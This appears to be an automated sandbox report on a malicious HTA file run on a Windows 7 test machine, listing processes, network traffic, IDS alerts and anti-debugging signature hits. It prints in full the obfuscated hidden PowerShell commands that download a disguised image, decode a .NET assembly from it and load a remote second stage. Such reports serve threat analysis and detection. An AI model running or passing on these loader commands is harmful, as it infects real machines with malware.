Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Sept. 13, 2023, 9:38 a.m. | Sept. 13, 2023, 9:40 a.m. |
-
iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\hkcmd.hta.html
1960-
-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
2620-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)"
2776
-
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
apps.identrust.com |
CNAME
a1952.dscq.akamai.net
CNAME
identrust.edgesuite.net
|
23.67.53.17 |
uploaddeimagens.com.br | 172.67.215.45 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49176 -> 104.21.45.138:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49176 104.21.45.138:443 |
C=US, O=Let's Encrypt, CN=E1 | CN=uploaddeimagens.com.br | 67:68:c4:e4:aa:54:e1:fd:f0:50:01:73:1e:da:cf:48:0c:17:0d:34 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
file | C:\Users\test22\Desktop\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)" |
cmdline | powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD |
Data received | [ |
Data received | Weß ?I^d*ú]#ê±ÛðDOWNGRD ¿| [Çýv} |2»62¿«è73EÀÌ®¤À ÿ |
Data received | P |
Data received | |
Data received | ALÆUú¨eL ÂÓÚ´¥SXÛ.þ2 _fã)#ÔVjW54°Ø£1B½ïnn°´}þû sѬ F0D X °,çÛ¤Ã:ÿQ.2.©ÍØ+M¢áD(> rýû¯ £Èå~b`!ÀÝþñRzfy¿Ñ Ê̸ |
Data received | |
Data received | |
Data received | |
Data received | |
Data received | 0 |
Data received | qò_âåº\ÐtuïÝÌ&ãVõ{ô 1XsÀ= Páè^ÝvZ |
Data sent | y ue×%Ð53Ó#.Ø⥨ÅÚ¼(¬Ñ²Y¢ÙÔ / 5 ÀÀÀ À 2 8 4ÿ uploaddeimagens.com.br |
Data sent | F BAÝô2çä:v×//ª×LUª}Õä/7ÿËƵQãÑÍ»m¿èë; ä1 £hÒż#=®1Òûg´8W 0ïoôÐû´+L0ó!¾ö SQ@ÜËO'íÿ7Tg4»eÃ!I¨Q§ |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1960 CREDAT:145409 |
host | 117.18.232.200 |
parent_process | iexplore.exe | martian_process | powershell -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€G